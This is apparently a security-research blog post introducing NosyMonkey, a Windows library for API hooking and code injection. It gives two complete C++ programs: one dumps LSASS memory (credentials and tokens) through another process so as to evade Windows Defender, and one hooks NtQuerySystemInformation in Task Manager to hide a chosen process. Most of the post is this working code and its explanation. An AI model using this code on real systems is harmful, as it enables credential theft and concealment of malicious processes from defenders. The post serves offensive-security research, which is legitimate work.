NosyMonkey: API hooking and code injection made easy!

NosyMonkey: API hooking and code injection made easy!

By Alex Popovici

As a researcher I often run into situations in which I need to make a compiled binary do things that it wouldn’t normally do or change the way it works in some way. Of course, if one has the source, patching it is always an option but even then, recompiling it and making it work can be troublesome. In these cases, hooking and process injection immediately comes to mind.

The ability of modifying the result of an API (any API, from the OS or otherwise), modifying a parameter before the API is called or even preventing an API from being called in the first place can help aid researchers immensely. In general, controlling the execution flow of a process in a stealthy and stable way opens loads of possibilities for which your imagination is the true limit.

If you’ve often encountered any of these problems:

  • I have a program that doesn’t let you specify proxy settings.
  • I need to hide from certain processes the existence of my own process.
  • I want to prevent the Task Manager from killing another process.
  • I need to dump LSASS and Windows Defender is not letting me.
  • I want to close the handle of a file, open by another process.

Then you’ve probably thought about solving them with hooking and/or process injection like this:

  • Hook the function that opens the connection and add your proxy option.
  • HookNtQuerySystemInformation()or EnumProcesses() and hide your process from the output.
  • Hook OpenProcess() and set it to fail whenever a certain process Id is specified.
  • Execute different actions injecting in other processes to reduce your detection signature (Microservicing).
  • Inject a call to CloseHandle() inside of the process that owns the handle of that file and close it.

These are by no means new concepts or new techniques, but they can be complicated to achieve. Many times, I just resort to creating a DLL, and injecting it into the target process; this makes so that all of the functions and references inside my DLL remain valid. But it’s also cumbersome to do, is in no way stealthy, and it only resolves the code injection part of the equation, one still needs to figure out how to place a hook making sure that the target process doesn’t crash.

So, after reusing the same code for hooking over and over I thought, why not generalize it?

Enter, NosyMonkey: a library to inject code and place hooks that does almost everything for you. No need to write complicated ASM shellcode, or even think about allocating code, hot patching and other dirty business.

NosyMonkey will grab your c-style function, make all the references (API calls, strings, etc.) valid on your target process and copy it. This last part being the most important and time-consuming; as when you directly copy the ASM code generated by a compiler to an arbitrary process, all of the non-local references become invalid.

If your code points to a certain memory region for a String (for example), that string won't exist on the virtual memory of your target "injectee" process. But if NosyMonkey makes all of those references valid, you are then free to call it (with whichever parameters you want) or use it as a hook.

Now, since this is a tl;dr and POC||GTFO world I’m going to show a couple of examples in which I’ll explain the process injection and hooking capabilities of NosyMonkey with less than 100 lines of C++ code and without writing a single ASM instruction. We are going to explore two use cases:

  • Dumping LSASS without being detected by Windows Defender using API MicroServicing.
  • Hiding an arbitrary process from the Task Manager with a hook and using Direct System Calling.

Dumping LSASS

If you ever hacked into a Windows box, you know the value of dumping the memory of LSASS: It holds credentials, tokens and can easily give you Domain Admin depending on whom had connected to the system recently.

Back in the time, you could just upload Mimikatz and dump the memory there, as it either wasn’t detected, you could make it undetectable by modifying a couple of bytes or using a packer or you could just kill the AV without ill-effects.

Credential dumping with Mimikatz
Credential dumping with Mimikatz

Nowadays AVs are robust software that have behavior analysis and even if your dumper doesn’t get detected, the act of dumping surely will. But of course, there are legitimate uses in which dumping the memory of a process is a necessary so you can’t just denylist all process dumping. There must be a way.

EDR's role in dumping process

Bypassing EDR's behavior-based detection is often done via API Microservicing: This is dividing up your API calls and injecting code into host processes which execute these API calls for you. This greatly reduces your detection signature, so long as your injection technique remains stealthy.

So, how does a dumper work?
A dumper is basically a call to one API inside Dgbhelp.dll:

MiniDumpWriteDump Prototype

It takes as parameters:

  • A HANDLE of the process whose memory you want to dump.
  • The process ID of your target.
  • A HANDLE to the file in which the memory will be dumped.
  • MiniDumpWithFullMemory (0x2)

And the rest NULLs. It will then generate a dump file that you can take and analyze offline to get any credentials it may have. So, can we make another process call this API for us? We can with NosyMonkey:

#include "debug.hpp"
#include "../../include/nosymonkey.hpp"

void usage(char *arg1)
{
    string sExec(arg1);
    sExec = sExec.substr(sExec.find_last_of('\\')+1);
    cout << "Dump any process by execution redirection." << endl << endl;
    cout << "By Alex Popovici, part of NosyMonkey's examples (@alex91dotar) github.com/alex91ar" << endl;
    cout << "----------------------------------------------------------------------------------" << endl << endl;
    cout << sExec << " [host process] [target process] [dump file]" << endl << endl;
    cout << "Use cmd.exe as host process. Other single-threaded processes might work as well!" << endl << endl;
    ExitProcess(1);
}

/*
This is a cool example of what we can do with Nosymonkey. lsass.exe's memory has credentials, tokens and other yummy stuff for hackers like me.
Main problem is that EDRs detect whenever someone tries to dump LSASS and stops it (go ahead and try it, open task manager, right click on lsass.exe and dump its memory)

This dumper uses Nosymonkey to load dbgcore.dll and dbghelp.dll into another process, and then calls MiniDumpWriteDump on that process.
This fools EDRs (at least Defender) into allowing the dump.

Remember to run this as an Administrator, otherwise it won't work.
*/

bool loadDlls()
{
    HMODULE dll1 = LoadLibrary("dbgcore.dll");
    HMODULE dll2 = LoadLibrary("dbghelp.dll");
    if(dll1 && dll2) return true;
    else return false;
}

int main(int argc, char **argv)
{
    if(argc != 4) usage(argv[0]);
    setCopyDepth(0); //No local calls, no need for depth.
    HANDLE hFile = CreateFile(argv[3], GENERIC_WRITE, FILE_SHARE_WRITE|FILE_SHARE_READ, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    uintptr_t miniDumpWriteDump = (uintptr_t) GetProcAddress(LoadLibrary("dbghelp.dll"), "MiniDumpWriteDump");
    if(hFile != INVALID_HANDLE_VALUE)
    {
        DWORD dwPid = getProcessId(argv[1]);
        DWORD dwLsass = getProcessId(argv[2]);
        if(dwPid && dwLsass)
        {
            if(givePrivs(dwPid) && givePrivs(GetCurrentProcessId()))
            {
                HANDLE hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, dwLsass);
                uintptr_t remoteHand = dupHandle(dwPid, hLsass);
                uintptr_t remoteFil = dupHandle(dwPid, hFile);
                if(remoteHand && remoteFil)
                {
                    uintptr_t GLEval = 0;
                    uintptr_t retval = copyAndExecWithParams(dwPid, loadDlls, &GLEval, {});
                    cout << (hex) << "LoadDLLs() = 0x" << retval << ". GLE = 0x" << GLEval << endl;
                    if(retval)
                    {
                        retval = execWithParams(dwPid, miniDumpWriteDump, &GLEval, {remoteHand, (uintptr_t) dwLsass, remoteFil, 2, 0, 0, 0});
                        cout << (hex) << "MiniDumpWriteDump() = 0x" << retval << ". GLE = 0x" << GLEval << endl;
                        while(true)
                        {
                            cout << "Closing file handle..." << endl;
                            uintptr_t closeHandle = (uintptr_t) GetProcAddress(LoadLibrary("kernel32.dll"), "CloseHandle");
                            retval = execWithParams(dwPid, closeHandle, &GLEval, {remoteFil});
                            if(retval) break;
                            Sleep(1000);
                        }
                        cout << "Your dump should be in " << argv[3] << endl;
                    }
                }
                debugcry("dupHandle");
            }
            else cout << "Could not get SeDebugPrivilege for processes." << endl;
        }
        else cout << "Processes " << argv[1] << " or " << argv[2] << " not found." << endl;
    }
    debugcry("CreateFile");
    return 0;
}

See? 79 lines including the usage screen and comments and we are:

  • Creating our dump file with CreateFileA().
  • Getting the address of MiniDumpWriteDump() (remember that ASLR is global per OS restart) with GetProcAddress()
  • Finding the PIDs for our surrogate Dumper and the Dumpee (LSASS in this case) with NosyMonkey’s getProcessId()
  • Giving SE_DEBUG_PRIVILEGE to our process and the Dumper process with NosyMonkey’s givePrivs()
  • Open a HANDLE to LSASS with OpenProcess().
  • Duplicate the dump file’s and the LSASS process’s handles so they are valid in the dumper process using NosyMonkey’s dupHandle().
  • Load the DLLs DbgHelp.dll and DbgCore.dll into the dumper by injecting a function. Note that we are using strings there, which are copied and their references recalculated. For this we use NosyMonkey’s copyAndExecWithParams().
  • We then call MiniDumpWriteDump(), passing the parameters necessary so our dumper process dumps LSASS. For this we use NosyMonkey’s execWithParams().
  • Finally, we close the file HANDLE, so it doesn’t stay open in the dumper process.

And it works too (without triggering Windows Defender):

Dumping LSASS with NosyMonkey

Hiding a process from the Task Manager

There are many ways of getting the current processes running on a Windows box using WinAPI most commonly you can use EnumProcesses() or CreateToolhelp32Snapshot(). But the Task Manager does it by calling NtQuerySystemInformation() directly. This is an “Undocumented” (Nowadays most “Undocumented” APIs are unofficially documented) API from ntdll.dll which does a system call.

Task Manager does this because doing a system call instead of going through a wrapper higher-level API avoids unnecessary boilerplate instructions and allows the process to be more efficient. Problem is going through the gargantuan structure that  NtQuerySystemInformation() returns is a bit of a hassle, especially if one is trying to remove an item from that structure.

One neat thing about NosyMonkey though, is that for APIs that do a context switch, the hook does a direct system call, and you can leave the patch there without problem. This is great for synchronization. So, I know I promised less than 100 lines, so I need to cheat a bit because the upper part of this example includes structure definitions for the API call, which are not defined in Microsoft’s headers (because they are again “undocumented”). But, if you remove that, we are still under the 100 lines:

#include "debug.hpp"
#include "../../include/nosymonkey.hpp"
#include "ntdefs.hpp"

void usage(char *arg1)
{
    string sExec(arg1);
    sExec = sExec.substr(sExec.find_last_of('\\')+1);
    cout << "Hide a process by hooking NtQuerySystemInformation." << endl << endl;
    cout << "By Alex Popovici, part of NosyMonkey's examples (@alex91dotar) github.com/alex91ar" << endl;
    cout << "----------------------------------------------------------------------------------" << endl << endl;
    cout << sExec << " [target process] [process to hide]" << endl << endl;
    cout << "Try taskmgr.exe as your target process."  << endl << endl;
    ExitProcess(1);
}
char pszProcessHidden[256];

/*
This is a good example of how to /avoid/ using local functions (i.e. those that are statically linked to your main module) and instead use equivalents
which can be referenced by Nosymonkey on your target process.
I wrote this before I implemented support for local functions, but the idea remains the same:

pszProcessHidden is a global variable, which is copied into the target executable by Nosymonkey.

We place the hook on the function NtQuerySystemInformation from ntdll.dll. This function is an "NT" function
which means that it does a context switch (via a system call), thus we can use direct system calling to restore the flow of execution.

This function is called by Taskmgr.exe to get the list of executables, we then traverse the list, compare the process names and hide
the one that we want.

Note that:
- originalCall() is used as a placeholder to call the original version of NtQuerySystemInformation, this is a dummy function that will be replaced.
- MultyByteToWideChar() is used to convert pszProcessHidden to UNICODE, as NtQuerySystemInformation returns wide-char strings.
- LocalAlloc()/LocalFree() are used instead of the new operator or malloc(), which are both locally referenced.
- CompareStringW() is used instead of wcscmp() for the same reason.

Also, since we're not using local function calls, we can just call setCopyDepth(0), to reduce the final shellcode size and skip that part of the process.

*/

uintptr_t NtQuerySystemInformationHook(uintptr_t SystemInformationClass,uintptr_t SystemInformation,uintptr_t SystemInformationLength,uintptr_t ReturnLength)
{
    uintptr_t ntOut = originalCall(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength); //Call the original NtQuerySystemInformation via direct system call.
    if(ntOut == 0 && SystemInformationClass == SystemProcessInformation)
    {
        //The operator "New" points to a statically linked function so, can't use it. LocalAlloc works though.
        wchar_t *pwszTemp = (wchar_t *) LocalAlloc(LMEM_ZEROINIT, sizeof(wchar_t)*256);
        //Global variables are referenced via relative PTR instructions.
        MultiByteToWideChar(CP_UTF8, MB_PRECOMPOSED, pszProcessHidden, -1, pwszTemp, 256*sizeof(wchar_t));
        PSYSTEM_PROCESSES infoP = (PSYSTEM_PROCESSES)SystemInformation;
        PSYSTEM_PROCESSES lastInfoP = NULL;
        while(infoP) //The logic looks wonky but it works.
        {
            lastInfoP = infoP;
            infoP = (PSYSTEM_PROCESSES)(((LPBYTE)infoP) + infoP->NextEntryDelta); //The first one is always "System" so we can skip it.
            //Can't use wcscmp because it looks like it's statically built.
            //CompareStringW is from kernel32.dll so it should be fine to call.
            if(CompareStringW(LOCALE_USER_DEFAULT, LINGUISTIC_IGNORECASE, infoP->ProcessName.Buffer, -1, pwszTemp, -1) == CSTR_EQUAL)
            {
                if(infoP->NextEntryDelta)
                {
                    //We need to tell the list that the next item is referenced after the one we want to hide.
                    ULONG newEntryDelta = lastInfoP->NextEntryDelta + infoP->NextEntryDelta;
                    //We go back to the previous one.
                    infoP = (PSYSTEM_PROCESSES)(((LPBYTE)infoP) - lastInfoP->NextEntryDelta);
                    lastInfoP->NextEntryDelta = newEntryDelta;
                }
                else lastInfoP->NextEntryDelta = 0;
            }
            if (!infoP->NextEntryDelta) break;
        }
        LocalFree(pwszTemp);
    }
    return ntOut;
}

int main(int argc, char **argv)
{
    if(argc != 3) usage(argv[0]);
    setCopyDepth(0);
    strcpy(pszProcessHidden, argv[2]);
    DWORD dwPid = getProcessId(argv[1]);
    if(dwPid)
    {
        cout << "Hiding process " << pszProcessHidden << endl;
        if(hookAPIDirectSyscall(dwPid, (LPVOID)NtQuerySystemInformationHook, "NtQuerySystemInformation"))
        {
            return 0;
        }
    }
    return 1;
}

The NtQuerySystemInformationHook() function of the example is the one that gets executed instead of the original function. A few things are noteworthy here:

  • The originallCall() function is a variadic template function that takes any number of parameters. It’s just a hack so we can easily call the original version of the API, which is necessary to perform the hook. During processing its identified and replaced.
  • I’m using the WinAPI versions of functions, because they are saved in the IAT of the process instead of being locally referenced functions (see “limitations” for more info). To this end:
    • New/Delete operators are replaced with LocalAlloc/LocalFree.
    • MultiByteToWideChar is used to convert ANSI strings to Unicode strings, since NtQuerySystemInformation() returns Unicode strings, and we need to compare them to identify the process we want to hide.
    • CompareStringW is used to compare Unicode strings, for the same reason.

The main code is very short because we just need to call NosyMonkey’s hookAPIDirectSyscall() to place our hook. And that’s it!

Calling hideprocess to hide "code.exe"

 

Code.exe hidden

Limitations

There are a few limitations, some of which I will address in the future, some I’ll do my best to address, some I don’t think I can do much:

  • For non-context-switching APIs, NosyMonkey’s detourApiHook() copies a version of the DLL and loads it again so it may have a way of going to the original code that has been replaced by the hook. In the future I’m going to use MemoryModule to reflectively load another version.
  • For the above-mentioned reason, non-ASLR DLLs cannot be hooked by NosyMonkey because the second version would be loaded with the same Base Address.
  • I’m working on Unit Tests; I’ll add more in the future.
  • You need to link with -ladvapi32 and -lpsapi.
  • Local calls (e.g., calling new/delete operators, strcmp or other statically-linked functions) may work. NosyMonkey tries to identify the amount of code it must copy, but it’s a tough problem to solve. You can tune this with the functions NosyMonkey’s setCopyDepth() and NosyMonkey’s setCopyCodeSize() but identifying where a function that branches ends goes into halting problem territory. If you have any suggestions on how to improve these heuristics, throw them my way!

Closing Thoughts

Thank you for reading!
If you want to contact me, you can do so via my socials (see below).

The source code for NosyMonkey is here: https://github.com/anvilsecure/nosymonkey

I'm open to feedback and ways to improve the library, feel free to send me Issues! If you find any bugs, please include the code in which you use NosyMonkey. That way I'll be able to pinpoint the issue, fix the bug or troubleshoot the problem.

About the Author

Alex Popovici is currently a Senior Security Engineer at Anvil Secure. Although he mostly works with web-applications, having held different positions across his 10 years of experience has given him a diverse skillset.

Whenever a new exploitation challenge arises, whether the target is Windows or *nix, Kernel or Userland or Web or Binary, Alex dives into it with determination and passion.

When he is offline, Alex likes to go in nature hiking to disconnect and recover his Hit Points.

Tools

awstracer - An Anvil CLI utility that will allow you to trace and replay AWS commands.


awssig - Anvil Secure's Burp extension for signing AWS requests with SigV4.


dawgmon - Dawg the hallway monitor: monitor operating system changes and analyze introduced attack surface when installing software. See the introductory blogpost


nanopb-decompiler - Our nanopb-decompiler is an IDA python script that can recreate .proto files from binaries compiled with 0.3.x, and 0.4.x versions of nanopb. See the introductory blogpost


ulexecve - A tool to execute ELF binaries on Linux directly from userland. See the introductory blogpost


usb-racer - A tool for pentesting TOCTOU issues with USB storage devices.

Recent Posts